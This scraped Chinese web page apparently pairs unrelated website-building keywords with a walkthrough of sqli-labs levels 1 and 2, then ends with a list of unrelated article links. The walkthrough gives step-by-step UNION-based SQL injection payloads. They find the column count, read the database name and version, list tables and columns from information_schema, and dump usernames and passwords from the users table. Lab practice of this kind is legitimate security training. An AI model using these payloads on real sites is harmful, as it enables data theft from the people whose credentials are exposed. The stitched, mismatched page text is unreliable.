当前位置: 首页 > news >正文

备案 添加网站wordpress edd支付宝

news 2025/9/16 22:34:49
备案 添加网站,wordpress edd支付宝,机关网站建设费入什么科目,网站网页设计屏幕尺寸sqli-labs第一关 判断是否存在sql注入 可见#xff0c;根据输入数字的不同#xff0c;结果也不同 判断sql语句是否是拼接#xff0c;且是字符型还是数字型 由上可见#xff0c;这关指定是字符型且存在sql注入漏洞 使用联合注入 第一步#xff1a;首先知道表格有几列根据输入数字的不同结果也不同 判断sql语句是否是拼接且是字符型还是数字型 由上可见这关指定是字符型且存在sql注入漏洞 使用联合注入 第一步首先知道表格有几列如果报错就是超过列数如果显示正常就是没有超出列数。 ?id1order by 3 -- 第二步爆出显示位就是看看表格里面那一列是在页面显示的。可以看到是第二列和第三列里面的数据是显示在页面的。 ?id-1union select 1,2,3-- 第三步获取当前数据名和版本号。 ?id-1union select 1,database(),version()-- 第四步 爆表 ?id-1union select 1,2,group_concat(table_name) from information_schema.tables where table_schemasecurity-- 第五步爆字段名 ?id-1union select 1,2,group_concat(column_name) from information_schema.columns where table_nameusers-- 第六步通过上述操作可以得到两个敏感字段就是username和password,接下来我们就要得到该字段对应的内容。 ?id-1 union select 1,2,group_concat(username ,id , password) from users-- sqli-labs第二关 和第一关是一样进行判断当我们输入单引号或者双引号可以看到报错且报错信息看不到数字所有我们可以猜测sql语句应该是数字型注入。 加注释还是提示报错证明是数字型 进行一个联合查询。?id-1 union select 1,2,3 -- 使用order by 1到order by 4发现order by 4时查看到列数只有四个。 接着查看它的数据库名字和版本号在实战中就可以用以在网上查找该版本相应的漏洞之类的。?id-1 union select 1,database(),version()--,查看到数据库名为security版本为5.7.26. 再查找出在MySQL自带库information_schema中存在的table表表名则通过?id-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schemadatabase()--查询出表名。 或者输入?id-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schemasecurity--。其效果也是一样 然后我们继续深入查看users这张表输入?id-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_nameusers --。发现其中包含有username和password这两张我们的最终目的表。 最后查询这两张表中的数据拿到我们想要的用户名和密码输入?id-1 union select 1,username,password from users where id2 --
http://www.tj-hxxt.cn/news/139088.html

相关文章:

  • 宁波企业如何建网站企业邮箱是哪个
  • 一个网站建设需要什么云趣在线企业网站建设
  • 主要的网站开发技术iis wordpress index.php
  • 2017网站开发新技术昆明网站建设在河科技
  • 济南城市建设集团网站郑州网站建设哪家强
  • 公司网站如何推广做交互的网站
  • ps做网站首页的尺寸北京网站优化公司哪家好
  • 福建泉州网站建设公司提供郑州网站建设
  • 网站后台程序开发wordpress frame
  • 做网站百度收费吗自适应网站建站价格
  • 珠海网站建设烟台开发区网站
  • 烟台网站seo外包常州seo排名外包
  • 一个网站突然打不开网站规划书的内容有哪些
  • 怎么做一考试网站怎么推广视频号
  • 网站 建设运行情况天津网站开发tjniu
  • 医疗门户网站模板石家庄市工程建设造价管理站网站
  • 网站经常做封面的那些番号网站建设讲话
  • 曲沃网站建设wordpress手动裁剪
  • xz域名网站沧州美升网络科技有限公司
  • 长春网站建设net注册网站会不会有风险
  • 工业风 网站建设专业团队为您服务
  • php网站开发需求文档临沂网站建设举措
  • 做钓鱼网站软件共享农业网站建设
  • 溧阳市建设网站成都酒店设计十大公司排名
  • 网络营销网站建设知识免费表格模板网站
  • 快速搭建网站页面wordpress博客蜘蛛统计
  • 夏天做哪些网站致富公司网站建设 wordpress
  • 仿站参考网站齐家网装修口碑怎么样
  • 武乡网站建设南京网站制作希丁哥
  • 谁会做网站排名php做的网站后台